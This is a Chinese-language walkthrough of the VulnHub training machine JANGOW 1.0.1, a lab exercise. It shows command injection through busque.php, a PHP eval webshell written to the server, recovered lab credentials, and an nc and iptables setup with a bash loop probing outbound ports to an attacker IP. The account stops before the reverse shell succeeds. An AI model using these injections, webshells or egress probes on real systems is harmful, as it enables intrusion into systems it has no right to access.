vulnhub靶場之JANGOW: 1.0.1

準備:
攻擊機:虛擬機kali、本機win10 。
靶機:JANGOW: 1.0.1,地址我這里設置的橋接,,下載地址:https://download.vulnhub.com/jangow/jangow-01-1.0.1.ova.torrent,下載后直接VirtualBox打開,測試時發現vm打開之后靶機獲取ip會出問題(設置的橋接,在網上看了vm修改ip的問題比較麻煩,所以就直接用的VirtualBox) 。

vulnhub靶場之JANGOW: 1.0.1

文章插圖
信息收集:
掃描下靶機開放的端口和服務:nmap -T4 -sV -p- -A 172.20.10.2,顯示開放了21、80端口,對應的服務是ftp服務和apache服務 。
vulnhub靶場之JANGOW: 1.0.1

文章插圖
訪問下ftp服務和tomcat服務,但是ftp服務缺少賬號和密碼無法登錄,tomcat服務返回了一個界面
vulnhub靶場之JANGOW: 1.0.1

文章插圖
vulnhub靶場之JANGOW: 1.0.1

文章插圖
期間也對:http://172.20.10.2/和http://172.20.10.2/site/進行了目錄掃描,但是并沒有什么發現
vulnhub靶場之JANGOW: 1.0.1

文章插圖

vulnhub靶場之JANGOW: 1.0.1

文章插圖
然后就在主頁面尋找功能點,右鍵查看源代碼信息,在代碼中發現busque.php文件和傳遞的參數buscar,猜測這里是命令執行漏洞或代碼執行漏洞并進行測試,url:http://172.20.10.2/site/busque.php?buscar=id,可以查看pwd、ls等信息,確認這里存在命令執行漏洞 。
vulnhub靶場之JANGOW: 1.0.1

文章插圖

vulnhub靶場之JANGOW: 1.0.1

文章插圖

vulnhub靶場之JANGOW: 1.0.1

文章插圖
web滲透:
通過命令執行寫入一句話后門,url:http://172.20.10.2/site/busque.php?buscar=echo '<?php eval($_POST['upfine']);?>' > upfine.php,然后通過蟻劍進行連接 。
vulnhub靶場之JANGOW: 1.0.1

文章插圖
在wordpress下發現config.php文件、html下發現.backup文件,/home/jangow01/下發現user.txt文件,root文件夾無權限查看(后面肯定要進行提權,那我們就得先獲得shell權限),下載下來進行查看,發現兩個賬戶名和密碼,其中jangw01/abygurl69可以用于ftp登錄 。
vulnhub靶場之JANGOW: 1.0.1

文章插圖

vulnhub靶場之JANGOW: 1.0.1

文章插圖
vulnhub靶場之JANGOW: 1.0.1

文章插圖

vulnhub靶場之JANGOW: 1.0.1

文章插圖
接下來進行反彈shell,但是發現nc參數不全,無法使用 。
vulnhub靶場之JANGOW: 1.0.1

文章插圖
經過多種shell反彈測試,但是均未反彈成功,最后發現對端口進行了限制,經過測試發現443端口可以使用,端口測試過程如下:
在攻擊機中安裝iptables和libcbor0,在kali(攻擊機)中使用iptables進行端口綁定,這里就限制了400:500的端口,語句:sudo iptables -A PREROUTING -t nat -p tcp --dport 400:500 -j REDIRECT --to-port 6688 。
vulnhub靶場之JANGOW: 1.0.1

文章插圖
然后開啟對6688端口的監聽:nc -lvvp 6688,在然后在靶機中上傳 一個簡單的探測腳本,腳本信息:
for i in {400..450};dotimeout 1 nc -vz 172.20.10.5 $i && echo "$i open" >> result.txt || echo "$i closed" >> result.txt;done然后在蟻劍的命令窗口中執行腳本:bash test.sh,獲得可以使用的端口信息 。

經驗總結擴展閱讀